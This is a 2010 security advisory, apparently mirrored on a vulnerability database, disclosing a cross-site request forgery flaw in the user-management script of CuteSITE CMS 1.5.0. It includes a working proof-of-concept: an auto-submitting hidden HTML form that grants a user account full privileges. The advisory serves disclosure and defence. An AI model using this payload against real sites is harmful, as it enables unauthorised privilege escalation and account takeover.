Lucene search
K

CuteSITE CMS 1.5.0 Cross Site Request Forgery

🗓️ 08 Jun 2010 00:00:00Reported by High-Tech Bridge SAType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

CuteSITE CMS 1.5.0 Cross Site Request Forgery Vulnerability with Low Risk Leve

Code
`Vulnerability ID: HTB22395  
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_cutesite_cms.html  
Product: CuteSITE CMS  
Vendor: AMT Company  
Vulnerable Version: 1.5.0 and Probably Prior Versions  
Vendor Notification: 20 May 2010   
Vulnerability Type: CSRF (Cross-Site Request Forgery)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Low   
Credit: High-Tech Bridge SA (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists due to failure in the "/manage/add_user.php" script to properly verify the source of HTTP request.   
  
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.   
  
Attacker can use browser to exploit this vulnerability. The following PoC is available:   
  
  
<FORM action="http://host/manage/add_user.php" method="POST" name="main">  
<input type="hidden" name="fld_priv" value="W">  
<input type="hidden" name="tpl_priv" value="W">  
<input type="hidden" name="img_priv" value="W">  
<input type="hidden" name="str_priv" value="W">  
<input type="hidden" name="txt_priv" value="W">  
<input type="hidden" name="var_priv" value="W">  
<input type="hidden" name="snp_priv" value="W">  
<input type="hidden" name="usr_priv" value="W">  
<input type="hidden" name="hst_priv" value="W">  
<input type="hidden" name="plg_priv" value="W">  
  
<INPUT type="hidden" name="user_id" value="33">  
<INPUT type="hidden" name="user_login" value="userlogin">  
<INPUT type="hidden" name="action" value="Modify">  
</FORM>  
<script>  
document.main.submit()  
</script>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation